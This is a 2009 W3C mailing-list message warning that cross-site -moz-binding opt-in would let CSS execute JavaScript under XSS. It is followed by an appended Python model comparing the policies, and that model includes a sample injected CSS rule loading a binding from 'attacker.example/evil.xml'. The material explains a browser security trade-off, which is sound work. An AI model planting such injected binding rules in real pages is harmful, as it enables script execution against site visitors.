- From: <sird@rckc.at>
- Date: Mon, 7 Dec 2009 16:30:01 +0800
- To: Ian Hickson <ian@hixie.ch>
- Cc: Devdatta <dev.akhawe@gmail.com>, public-web-security@w3.org
Received on Monday, 7 December 2009 08:30:54 UTC
Ian, are you aware that that will provide CSS the power to execute JavaScript cross-site? (think on XSS). Right now we can't do this on Firefox anymore, because they limited it to same domain, but if this gets implemented then attacker.com will just send the header so his script will be loaded.

I thought that was the reason moz bindings were disabled in the first place =/ because no one wanted CSS to execute JS.

Greetings!!

-- 
Eduardo
http://www.sirdarckcat.net/
Sent from Hangzhou, 33, China

On Mon, Dec 7, 2009 at 3:28 PM, Ian Hickson <ian@hixie.ch> wrote:
> On Mon, 7 Dec 2009, sird@rckc.at wrote:
> >
> > a.example.com/mozbind.html
> >
> > or
> >
> > b.example.net/binding.xml
>
> Both. a.example.com/mozbind.html has to reference
> b.example.net/binding.xml, and b.example.net/binding.xml has to opt-in to
> supporting a.example.com.
>
> --
> Ian Hickson               U+1047E                )\._.,--....,'``.    fL
> http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
> Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
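The disagreement in this exchange is about which party grants permission for a cross-site binding. The following model, added here as an illustration and not code from the thread, Mozilla or the W3C, compares the two policies discussed: the same-origin rule Eduardo says Firefox applies today, and the proposed rule where the binding host opts in to page origins via a response header. The header name `X-Binding-Allow-Origin`, the regex for `-moz-binding` declarations and both scenarios (a legitimate a.example.com / b.example.net pairing, and a style rule injected into a victim page pointing at an attacker-hosted binding) are constructed assumptions.

```python
import re
from typing import Callable, Dict, List
from urllib.parse import urlparse

# Hypothetical opt-in header name; the thread does not name the real one.
OPT_IN_HEADER = "X-Binding-Allow-Origin"

# Matches `-moz-binding: url(...)` with or without quotes around the URL.
BINDING_RE = re.compile(
    r"-moz-binding\s*:\s*url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)", re.I
)


def extract_binding_urls(css: str) -> List[str]:
    """Return every URL named by a -moz-binding declaration in a stylesheet."""
    return BINDING_RE.findall(css)


def origin_of(url: str) -> str:
    """scheme://host[:port] of a URL, the unit both policies compare."""
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}"


# A policy takes (page origin, binding URL, headers the binding server sent).
Policy = Callable[[str, str, Dict[str, str]], bool]


def same_origin_policy(page_origin: str, binding_url: str, headers: Dict[str, str]) -> bool:
    """Rule Eduardo attributes to current Firefox: binding must share the page's origin."""
    return origin_of(binding_url) == page_origin


def host_opt_in_policy(page_origin: str, binding_url: str, headers: Dict[str, str]) -> bool:
    """Proposed rule: the binding host lists the page origins it supports."""
    if same_origin_policy(page_origin, binding_url, headers):
        return True
    allowed = [o.strip() for o in headers.get(OPT_IN_HEADER, "").split(",") if o.strip()]
    return "*" in allowed or page_origin in allowed


def evaluate(page_origin: str, css: str,
             responses: Dict[str, Dict[str, str]], policy: Policy) -> Dict[str, bool]:
    """Per binding URL found in `css`, decide whether `policy` lets the page apply it.
    `responses` maps a binding URL to the headers its server answered with."""
    return {url: policy(page_origin, url, responses.get(url, {}))
            for url in extract_binding_urls(css)}


# Constructed scenario 1: the legitimate cross-site use Ian describes.
LEGIT_PAGE = "http://a.example.com"
LEGIT_CSS = "div.widget { -moz-binding: url(http://b.example.net/binding.xml); }"
LEGIT_RESPONSES = {"http://b.example.net/binding.xml": {OPT_IN_HEADER: "http://a.example.com"}}

# Constructed scenario 2: the XSS case Eduardo raises. The style rule was injected
# into the victim page, and the binding host (hence the opt-in header) is the
# attacker's, so the header grants whatever the attacker wants it to.
VICTIM_PAGE = "http://victim.example.org"
INJECTED_CSS = "body { -moz-binding: url('http://attacker.example/evil.xml'); }"
ATTACKER_RESPONSES = {"http://attacker.example/evil.xml": {OPT_IN_HEADER: "*"}}


def compare_policies() -> Dict[str, Dict[str, bool]]:
    """Run both policies over both scenarios; True means the binding would load."""
    scenarios = [
        ("legitimate", LEGIT_PAGE, LEGIT_CSS, LEGIT_RESPONSES),
        ("injected", VICTIM_PAGE, INJECTED_CSS, ATTACKER_RESPONSES),
    ]
    out: Dict[str, Dict[str, bool]] = {}
    for name, page, css, responses in scenarios:
        out[name] = {
            "same_origin": all(evaluate(page, css, responses, same_origin_policy).values()),
            "host_opt_in": all(evaluate(page, css, responses, host_opt_in_policy).values()),
        }
    return out


if __name__ == "__main__":
    for scenario, verdicts in compare_policies().items():
        print(scenario, verdicts)
```

The result makes Eduardo's objection concrete: the host opt-in policy returns the same verdict for the legitimate pairing and for the injected rule, because in the injection case the party being asked for consent (the binding host) is the attacker. The same-origin rule blocks the injected binding, at the cost of also blocking the legitimate cross-site case, which is the trade-off the thread is arguing over.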